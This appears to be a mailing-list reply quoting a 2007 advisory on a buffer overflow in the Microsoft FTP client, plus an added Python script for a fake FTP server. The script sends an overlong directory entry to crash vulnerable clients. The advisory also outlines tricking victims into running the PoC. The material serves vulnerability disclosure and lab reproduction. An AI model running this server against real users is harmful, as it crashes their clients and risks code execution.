Server down, I can't see the PoC files :-( -mark
On 28/11/2007, Rajesh Sethumadhavan <[EMAIL PROTECTED]> wrote:
>
> Microsoft FTP Client Multiple Buffer Overflow Vulnerability
>
> #####################################################################
>
> XDisclose Advisory       : XD100096
> Vulnerability Discovered : November 20th 2007
> Advisory Reported        : November 28th 2007
> Credit                   : Rajesh Sethumadhavan
>
> Class                    : Buffer Overflow
>                            Denial Of Service
> Solution Status          : Unpatched
> Vendor                   : Microsoft Corporation
> Affected applications    : Microsoft FTP Client
> Affected Platform        : Windows 2000 Server
>                            Windows 2000 Professional
>                            Windows XP
>                            (Other versions may also be affected)
>
> #####################################################################
>
>
> Overview:
> A buffer overflow vulnerability is discovered in the Microsoft FTP
> client. Attackers can crash the FTP client of the victim user by
> tricking the user.
>
>
> Description:
> A remote attacker can craft a packet with a payload in the "mget",
> "ls", "dir", "username" and "password" commands as demonstrated
> below. When the victim executes the PoC or specially crafted packets,
> the FTP client will crash, with possible arbitrary code execution in
> the context of the logged-in user. This vulnerability is hard to
> exploit since it requires social engineering and the shellcode has
> to be injected as an argument to the vulnerable commands.
>
> The vulnerability is caused by an error in the Windows FTP client in
> validating commands like "mget", "dir", "user", "password" and "ls".
>
> Exploitation method:
>
> Method 1:
> - Send PoC with payload to user.
> - Social engineer victim to open it.
>
> Method 2:
> - Attacker creates a directory with a long folder or file name on
>   his FTP server (should be other than IIS server).
> - Persuade victim to run the command "mget", "ls" or "dir" on the
>   specially crafted folder using the Microsoft FTP client.
> - FTP client will crash and payload will get executed.
>
>
> Proof Of Concept:
> http://www.xdisclose.com/poc/mget.bat.txt
> http://www.xdisclose.com/poc/username.bat.txt
> http://www.xdisclose.com/poc/directory.bat.txt
> http://www.xdisclose.com/poc/list.bat.txt
>
> Note: Modify the PoC to connect to a lab FTP server
> (As of now it will connect to ftp://xdisclose.com)
>
> Demonstration:
> Note: Demonstration leads to crashing of Microsoft FTP Client
>
> Download the PoC, rename it to a .bat file and execute any one of
> the batch files:
> http://www.xdisclose.com/poc/mget.bat.txt
> http://www.xdisclose.com/poc/username.bat.txt
> http://www.xdisclose.com/poc/directory.bat.txt
> http://www.xdisclose.com/poc/list.bat.txt
>
>
> Solution:
> No Solution
>
> Screenshot:
> http://www.xdisclose.com/images/msftpbof.jpg
>
>
> Impact:
> Successful exploitation may allow execution of arbitrary code with
> the privileges of the currently logged-in user.
>
> Impact of the vulnerability is system level.
>
>
> Original Advisory:
> http://www.xdisclose.com/advisory/XD100096.html
>
> Credits:
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability.
>
>
> Disclaimer:
> This entire document is strictly for educational, testing and
> demonstrating purposes only. Modification, use and/or publishing of
> this information is entirely at your own risk. The exploit code /
> Proof Of Concept is to be used in a test environment only. I am not
> liable for any direct or indirect damages caused as a result of
> using the information or demonstrations provided in any part of
> this advisory.
>
> _______________________________________________
> darklab mailing list
> [email protected]
> http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
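Since the PoC files were unreachable, here is an added lab harness for reproducing "Method 2" of the advisory (an FTP server that hands the Windows client an overlong directory entry when it runs ls, dir or mget). It is example code written for this thread, not the XDisclose PoC and not Microsoft's or the darklab list's code. Assumptions: the listening port 2121, the 5000-byte entry name, the UNIX-style LIST line format and the constructed server banners are all my choices; the advisory names no length. The harness implements PORT (active mode) because the Windows ftp.exe client does not negotiate PASV on its own, and it answers NLST with names only, which is what the client sends for mget.

```python
"""Minimal fake FTP server for a lab: answers LIST/NLST with one overlong entry.

Added example for reproducing the advisory's "Method 2" against a test client.
Run only on an isolated network; the long entry exists solely to crash a
vulnerable client under test.
"""
import socket
import threading

NAME_LENGTH = 5000  # assumption: the advisory gives no specific length
LISTEN_PORT = 2121  # assumption: any free port works with "open host 2121"


def build_list_line(name_length=NAME_LENGTH, filler="A", names_only=False):
    """Return one directory entry whose name is name_length bytes long.

    names_only=True produces the NLST form (bare name), otherwise a UNIX-style
    LIST line of the kind most non-IIS FTP servers emit.
    """
    name = filler * name_length
    if names_only:
        return (name + "\r\n").encode()
    return (
        f"drwxr-xr-x   2 ftp      ftp          4096 Jan  1  2007 {name}\r\n"
    ).encode()


def parse_port(arg):
    """Parse a PORT argument 'h1,h2,h3,h4,p1,p2' into (host, port)."""
    parts = [int(p) for p in arg.split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("malformed PORT argument")
    host = ".".join(str(p) for p in parts[:4])
    return host, parts[4] * 256 + parts[5]


def handle_client(conn):
    """Serve one control connection; just enough of RFC 959 for ftp.exe."""
    data_target = None  # (host, port) the client asked us to connect back to
    with conn, conn.makefile("rb") as ctl:
        conn.sendall(b"220 lab ftp ready\r\n")
        for raw in ctl:
            cmd, _, arg = raw.decode(errors="replace").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                conn.sendall(b"331 password please\r\n")
            elif cmd == "PASS":
                conn.sendall(b"230 logged in\r\n")
            elif cmd == "SYST":
                conn.sendall(b"215 UNIX Type: L8\r\n")
            elif cmd == "PWD":
                conn.sendall(b'257 "/" is current directory\r\n')
            elif cmd in ("TYPE", "CWD"):
                conn.sendall(b"200 ok\r\n")
            elif cmd == "PORT":
                try:
                    data_target = parse_port(arg)
                    conn.sendall(b"200 PORT ok\r\n")
                except ValueError:
                    conn.sendall(b"501 bad PORT\r\n")
            elif cmd in ("LIST", "NLST"):
                if data_target is None:
                    conn.sendall(b"425 use PORT first\r\n")
                    continue
                conn.sendall(b"150 here comes the listing\r\n")
                # Active mode: we open the data connection back to the client.
                with socket.create_connection(data_target) as data:
                    data.sendall(build_list_line(names_only=(cmd == "NLST")))
                conn.sendall(b"226 transfer complete\r\n")
            elif cmd == "QUIT":
                conn.sendall(b"221 bye\r\n")
                break
            else:
                conn.sendall(b"502 not implemented\r\n")


def serve(host="0.0.0.0", port=LISTEN_PORT):
    """Accept control connections and hand each to its own thread."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(5)
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle_client, args=(conn,), daemon=True).start()


if __name__ == "__main__":
    serve()
```

Usage in the lab: start the script on the server box, then on the test client run ftp.exe, `open <server> 2121`, any user/password, then `ls`, `dir` or `mget *`. The client must accept the inbound data connection the server opens after PORT, so a host firewall on the client side may need an allow rule; if the client rejects the listing rather than crashing, raise NAME_LENGTH or compare against a build that is known to be affected.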
